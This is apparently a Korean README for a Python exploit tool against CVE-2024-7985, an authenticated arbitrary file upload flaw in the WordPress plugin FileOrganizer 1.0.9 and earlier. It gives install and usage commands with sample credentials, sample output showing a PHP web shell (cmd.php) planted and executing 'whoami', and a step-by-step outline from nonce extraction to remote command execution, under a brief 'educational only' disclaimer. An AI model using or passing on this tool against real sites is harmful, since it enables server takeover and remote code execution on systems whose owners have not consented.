
FileOrganizer <= 1.0.9 - 인증된 (구독자+) 임의 파일 업로드
FileOrganizer <= 1.0.9 - 인증된 (Subscriber+) 임의 파일 업로드
CVE-2024-7985 - WordPress 플러그인 FileOrganizer <= 1.0.9는 인증된 임의 파일 업로드 취약점에 노출되어, Subscriber+ 권한을 가진 공격자가 악성 파일을 원격으로 업로드 및 실행할 수 있습니다. 이 취약점은 fileorganizer_ajax_handler 함수에서 파일 유형 검증이 누락되어 발생하며, 원격 코드 실행(RCE)이 가능합니다.
🚨 이 익스플로잇을 통해 공격자는 서버에서 임의 명령을 실행할 수 있습니다! 🚨
requestsbeautifulsoup4의존성 설치:
pip install requests beautifulsoup4
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - 인증된(Subscriber+) 임의 파일 업로드 - 작성자: Nxploit Khaled_alenazi
옵션:
-h, --help 이 도움말 메시지를 표시하고 종료
--url URL 대상 WordPress 사이트 URL
--username USERNAME WordPress 사용자 이름
--password PASSWORD WordPress 비밀번호
--cmd CMD 업로드된 파일에서 실행할 명령어
[+] 취약한 버전 감지됨: 1.0.9
[+] 로그인 성공!
[+] 추출된 nonce: 7b4a95872b
[+] 파일 업로드 성공!
[+] 파일 접근: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
1️⃣ 버전 확인 - 사이트가 취약한지 확인
2️⃣ 인증 - WordPress에 로그인
3️⃣ Nonce 추출 - 보안 토큰 획득
4️⃣ 파일 업로드 - 악성 PHP 스크립트 업로드
5️⃣ 명령 실행 - 사용자가 지정한 명령 실행
이 스크립트는 교육 목적으로만 제공되며, 작성자는 오용이나 결과에 대해 책임을 지지 않습니다. 🚨